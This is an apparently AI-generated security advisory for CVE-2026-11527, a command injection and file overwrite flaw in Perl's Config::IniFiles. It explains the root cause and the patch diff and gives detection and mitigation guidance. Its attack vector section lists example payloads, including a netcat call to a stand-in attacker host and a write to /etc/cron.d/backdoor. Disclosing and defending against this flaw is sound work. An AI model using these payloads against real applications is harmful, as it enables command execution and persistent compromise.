CVE-2026-11527 Overview
CVE-2026-11527 affects Config::IniFiles versions before 3.001000 for Perl. The module exposes an OS command injection and file overwrite flaw through its _make_filehandle helper. The helper uses Perl's 2-argument open() to process the documented -file argument. When a caller forwards untrusted input, a filename beginning or ending with | runs as a shell command. A filename starting with > or >> truncates or appends to an arbitrary file. The flaw is classified under [CWE-73: External Control of File Name or Path].
Critical Impact
Any application that passes untrusted input to Config::IniFiles->new(-file => ...) can execute arbitrary commands or overwrite files under the process UID.
Affected Products
- Config::IniFiles for Perl, all versions before 3.001000
- Applications invoking new(-file => $thing) or ReadConfig with attacker-controlled paths
- Perl distributions and CPAN-based deployments shipping the vulnerable module
Discovery Timeline
- 2026-06-14 - Public disclosure via OpenWall oss-security list
- 2026-06-14 - CVE-2026-11527 published to NVD
- 2026-06-17 - Last updated in NVD database
Technical Details for CVE-2026-11527
Vulnerability Analysis
The vulnerability resides in Config::IniFiles::_make_filehandle, the open path behind the -file argument. The helper invokes Perl's 2-argument open() form, which interprets shell-magic prefixes and suffixes in filenames. A filename like "touch /tmp/pwned |" causes Perl to execute the command through the shell. A filename like "> /etc/target" truncates the named file rather than opening it for reading. The attack requires local access with user interaction, but yields high impact on confidentiality, integrity, and availability. An in-memory scalar reference passed as -file => \$text is unaffected because no path is opened.
Root Cause
Perl's 2-argument open($fh, $thing) interprets $thing as a mode-bearing expression. Leading or trailing | characters trigger command execution. Leading > or >> characters open the path for writing. The fix replaces the call with the 3-argument form open($fh, '<', $thing), which forces read-only file semantics and treats the argument as a literal pathname.
Attack Vector
An attacker who controls the value passed to -file can supply payloads such as "id |", "| nc attacker 4444", or "> /etc/cron.d/backdoor". The injected command runs with the privileges of the Perl process. Web applications, CLI tools, and configuration loaders that accept user-supplied paths are the primary exposure surface.
my $fh = qualify_to_ref( $thing, caller(1) );
return $fh if defined( fileno $fh );
- # otherwise treat it as a file to open
+ # otherwise treat it as a file to open; 3-arg open so the filename is
+ # not interpreted as a command or redirect
$fh = gensym;
- open( $fh, $thing ) || return;
+ open( $fh, '<', $thing ) || return;
return $fh;
} # end _make_filehandle
Source: GitHub Commit Patch
The patch converts the unsafe 2-argument open() to the safe 3-argument form, eliminating shell-magic interpretation.
Detection Methods for CVE-2026-11527
Indicators of Compromise
- Unexpected child processes spawned by Perl interpreters processing INI configuration files
- Files created or truncated under paths matching -file argument values supplied at runtime
- Audit log entries showing Config::IniFiles callers passing strings containing |, >, or >> characters
- Outbound network connections originating from Perl processes that normally only read configuration
Detection Strategies
- Inventory all Perl applications and CPAN dependencies to identify uses of Config::IniFiles below version 3.001000
- Static-analyze Perl source for calls to Config::IniFiles->new(-file => ...) where the value derives from request parameters, environment variables, or file uploads
- Review process-execution telemetry for shell invocations whose parent is a Perl process loading INI files
Monitoring Recommendations
- Alert on Perl processes spawning shells (/bin/sh, /bin/bash) or common payload binaries (nc, curl, wget)
- Monitor file integrity on sensitive paths writable by service accounts that run Perl-based applications
- Capture command-line arguments for Perl invocations to detect -file parameters containing pipe or redirect metacharacters
How to Mitigate CVE-2026-11527
Immediate Actions Required
- Upgrade Config::IniFiles to version 3.001000 or later via CPAN on all systems
- Audit application code that forwards user-supplied input into the -file argument and reject values containing |, >, or < characters
- Restrict the privileges of Perl processes that consume INI files so successful exploitation yields limited impact
- Where feasible, switch callers to the unaffected in-memory form -file => \$text when content is already loaded
Patch Information
The maintainer released Config::IniFiles 3.001000 with commit 3e48f9627fbba4dae5de35be1f735cdeb7e47fb8. The fix replaces the 2-argument open() in _make_filehandle with the 3-argument form. See the MetaCPAN Release Changes and the OpenWall OSS Security Post for the upstream advisory.
Workarounds
- Validate and canonicalize all path inputs before passing them to Config::IniFiles, rejecting strings beginning or ending with shell metacharacters
- Open the file in the caller and pass a filehandle or scalar reference instead of a raw path
- Apply mandatory access controls (AppArmor, SELinux) to confine Perl processes loading INI files
# Configuration example: upgrade via cpanm and verify version
cpanm Config::IniFiles@3.001000
perl -MConfig::IniFiles -e 'print "$Config::IniFiles::VERSION\n"'
# Input validation guard in calling code
perl -e 'my $f = shift; die "unsafe path" if $f =~ /^[|>]|[|]$|^>>/; print "ok\n"' -- "$USER_INPUT"
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
